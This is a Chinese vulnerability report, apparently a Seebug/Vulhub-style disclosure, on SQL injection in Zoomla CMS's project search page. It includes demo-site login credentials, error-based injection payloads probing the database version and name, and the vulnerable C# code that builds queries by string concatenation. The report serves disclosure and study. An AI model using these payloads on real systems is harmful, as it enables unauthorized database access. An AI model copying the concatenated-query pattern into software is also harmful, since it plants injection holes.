VULHUB ™

### 简要描述： 逐浪cms最新版sql注入 ### 详细说明： 访问 ``` http://demo.zoomla.cn/User/login.aspx ``` ``` test123 ``` ``` 111111 ``` 登录 然后访问 ``` http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx ``` 在关键字处输入 ``` 1' and (select @@version)>0-- ``` [<img src="https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png" alt="73.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png) 点击搜索 [<img src="https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png" alt="74.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png) 输入 ``` 1' and (select db_name())>0-- ``` [<img src="https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png" alt="75.png" width="600"...

### 简要描述： 逐浪cms最新版sql注入 ### 详细说明： 访问 ``` http://demo.zoomla.cn/User/login.aspx ``` ``` test123 ``` ``` 111111 ``` 登录 然后访问 ``` http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx ``` 在关键字处输入 ``` 1' and (select @@version)>0-- ``` [<img src="https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png" alt="73.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png) 点击搜索 [<img src="https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png" alt="74.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png) 输入 ``` 1' and (select db_name())>0-- ``` [<img src="https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png" alt="75.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png) 主要代码如下 ``` protected void Search_Click(object sender, EventArgs e) { string keyWord = this.SearchValue.Text.Trim(); //没处理 int type = DataConverter.CLng(this.DLType.SelectedValue); DataView defaultView = this.bll.ProjectSearch(type, keyWord).DefaultView; //跟进 this.Egv.DataSource = defaultView; this.Egv.DataKeyNames = new string[] { "ProjectID" }; this.Egv.DataBind(); } ``` ``` public DataTable ProjectSearch(int Type, string KeyWord) { string str = string.Empty; switch (Type) { case 0: str = "ProjectName like '%" + KeyWord + "%'"; break; case 1: str = "StartDate like '%" + KeyWord.Trim() + "%'"; break; case 2: str = "ProjectID=" + KeyWord; break; case 3: str = "ProjectIntro like '%" + KeyWord + "%'"; break; case 4: str = " UserID in (select UserID from ZL_User where UserName like '%" + KeyWord + "%')"; break; default: str = "ProjectName like '%" + KeyWord + "%'"; break; } string cmdText = "select * from [ZL_Project] where " + str; return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null); } //keyWord存在注入 ``` ### 漏洞证明： 漏洞证明如上